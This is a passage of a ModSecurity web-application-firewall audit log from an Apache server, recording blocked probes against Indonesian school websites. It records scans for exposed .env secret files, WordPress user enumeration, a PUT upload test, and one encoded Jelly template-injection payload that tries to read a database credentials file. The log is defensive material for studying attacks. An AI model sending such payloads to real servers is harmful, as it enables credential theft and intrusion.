p1=364, p2=0, p3=0, p4=0, p5=38, sr=152, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a057637-Z-- --cc8b9d0b-A-- [06/Jun/2025:04:43:18 +0700] aEIPdmaFzeU7VUj_TDFzrgAAAAM 103.236.140.4 47488 103.236.140.4 8181 --cc8b9d0b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.83.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.83.252 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --cc8b9d0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc8b9d0b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749159798300725 725 (- - -) Stopwatch2: 1749159798300725 725; combined=275, p1=241, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc8b9d0b-Z-- --c19aea22-A-- [06/Jun/2025:04:58:21 +0700] aEIS_eJsrKcXA4Tjex0GXQAAAEU 103.236.140.4 47732 103.236.140.4 8181 --c19aea22-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.189.154.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.189.154.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c19aea22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19aea22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749160701692529 3347 (- - -) Stopwatch2: 1749160701692529 3347; combined=1413, p1=495, p2=871, p3=0, p4=0, p5=47, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19aea22-Z-- --70f96307-A-- [06/Jun/2025:05:00:32 +0700] aEITgOJsrKcXA4Tjex0GYAAAAEs 103.236.140.4 47758 103.236.140.4 8181 --70f96307-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.61.91.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.61.91.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --70f96307-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70f96307-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749160832685151 3189 (- - -) Stopwatch2: 1749160832685151 3189; combined=1370, p1=481, p2=859, p3=0, p4=0, p5=30, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70f96307-Z-- --13c66c12-A-- [06/Jun/2025:05:23:35 +0700] aEIY5-JsrKcXA4Tjex0GdAAAAE8 103.236.140.4 47840 103.236.140.4 8181 --13c66c12-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173412650 --13c66c12-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c66c12-E-- --13c66c12-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749162215362546 3964 (- - -) Stopwatch2: 1749162215362546 3964; combined=1698, p1=535, p2=1121, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c66c12-Z-- --c19aea22-A-- [06/Jun/2025:05:38:22 +0700] aEIcXvHwHPygw9BuFzQ1sQAAAIE 103.236.140.4 47908 103.236.140.4 8181 --c19aea22-B-- PUT /testing-put.txt HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.50.16.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.50.16.252 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1 Content-Type: text/plain --c19aea22-C-- 2y6kdN9YivKg61kzeUyAqhxUspE --c19aea22-F-- HTTP/1.1 405 Method Not Allowed Allow: POST,OPTIONS,HEAD,GET,TRACE Content-Length: 220 Connection: close Content-Type: text/html; charset=iso-8859-1 --c19aea22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749163102347976 4695 (- - -) Stopwatch2: 1749163102347976 4695; combined=2839, p1=672, p2=2069, p3=33, p4=35, p5=29, sr=145, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19aea22-Z-- --4e6e9b1c-A-- [06/Jun/2025:05:45:37 +0700] aEIeEdKrQJH3faNNWWAW6QAAAM0 103.236.140.4 47996 103.236.140.4 8181 --4e6e9b1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.145.54.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.145.54.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4e6e9b1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e6e9b1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749163537474509 3206 (- - -) Stopwatch2: 1749163537474509 3206; combined=1293, p1=442, p2=821, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e6e9b1c-Z-- --63c2d956-A-- [06/Jun/2025:05:49:53 +0700] aEIfEeJsrKcXA4Tjex0GhAAAAFQ 103.236.140.4 48064 103.236.140.4 8181 --63c2d956-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236130 --63c2d956-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --63c2d956-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163793417572 555 (- - -) Stopwatch2: 1749163793417572 555; combined=196, p1=169, p2=0, p3=0, p4=0, p5=27, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63c2d956-Z-- --f1ed9f03-A-- [06/Jun/2025:05:49:53 +0700] aEIfEeJsrKcXA4Tjex0GhwAAAEA 103.236.140.4 48070 103.236.140.4 8181 --f1ed9f03-B-- GET /portal/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412748 --f1ed9f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f1ed9f03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163793965552 667 (- - -) Stopwatch2: 1749163793965552 667; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1ed9f03-Z-- --7b4e0b1f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEuJsrKcXA4Tjex0GiAAAAEE 103.236.140.4 48078 103.236.140.4 8181 --7b4e0b1f-B-- GET /env/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236136 --7b4e0b1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --7b4e0b1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794146505 569 (- - -) Stopwatch2: 1749163794146505 569; combined=249, p1=224, p2=0, p3=0, p4=0, p5=25, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b4e0b1f-Z-- --1b2f544f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW7gAAANc 103.236.140.4 48082 103.236.140.4 8181 --1b2f544f-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412751 --1b2f544f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b2f544f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794327261 766 (- - -) Stopwatch2: 1749163794327261 766; combined=287, p1=253, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2f544f-Z-- --a391b352-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW7wAAAMA 103.236.140.4 48086 103.236.140.4 8181 --a391b352-B-- GET /app/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236139 --a391b352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a391b352-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794508005 695 (- - -) Stopwatch2: 1749163794508005 695; combined=277, p1=244, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a391b352-Z-- --8c77620b-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW8AAAAMM 103.236.140.4 48090 103.236.140.4 8181 --8c77620b-B-- GET /dev/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412754 --8c77620b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8c77620b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794688806 673 (- - -) Stopwatch2: 1749163794688806 673; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c77620b-Z-- --b3326f0f-A-- [06/Jun/2025:05:49:54 +0700] aEIfEtKrQJH3faNNWWAW8QAAAMI 103.236.140.4 48094 103.236.140.4 8181 --b3326f0f-B-- GET /new/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236142 --b3326f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b3326f0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163794869588 668 (- - -) Stopwatch2: 1749163794869588 668; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3326f0f-Z-- --125f4d46-A-- [06/Jun/2025:05:49:55 +0700] aEIfE-JsrKcXA4Tjex0GiQAAAEQ 103.236.140.4 48098 103.236.140.4 8181 --125f4d46-B-- GET /new/.env.local HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412757 --125f4d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --125f4d46-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795050402 741 (- - -) Stopwatch2: 1749163795050402 741; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --125f4d46-Z-- --9425cf16-A-- [06/Jun/2025:05:49:55 +0700] aEIfE9KrQJH3faNNWWAW8gAAAMY 103.236.140.4 48102 103.236.140.4 8181 --9425cf16-B-- GET /new/.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236145 --9425cf16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9425cf16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795231324 674 (- - -) Stopwatch2: 1749163795231324 674; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9425cf16-Z-- --e7966018-A-- [06/Jun/2025:05:49:55 +0700] aEIfE9KrQJH3faNNWWAW8wAAAMc 103.236.140.4 48106 103.236.140.4 8181 --e7966018-B-- GET /new/.env.staging HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173412760 --e7966018-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7966018-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163795412153 694 (- - -) Stopwatch2: 1749163795412153 694; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7966018-Z-- --59ddc75e-A-- [06/Jun/2025:05:49:56 +0700] aEIfFNKrQJH3faNNWWAW-gAAAM4 103.236.140.4 48110 103.236.140.4 8181 --59ddc75e-B-- GET /awstats/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 Accept-Encoding: gzip X-Varnish: 173236157 --59ddc75e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --59ddc75e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749163796693747 662 (- - -) Stopwatch2: 1749163796693747 662; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59ddc75e-Z-- --2631e443-A-- [06/Jun/2025:05:49:56 +0700] aEIfFGaFzeU7VUj_TDFzzgAAABI 103.236.140.4 48126 103.236.140.4 8181 --2631e443-B-- GET /conf/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 185.177.72.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Cookie: X-Forwarded-For: 185.177.72.107 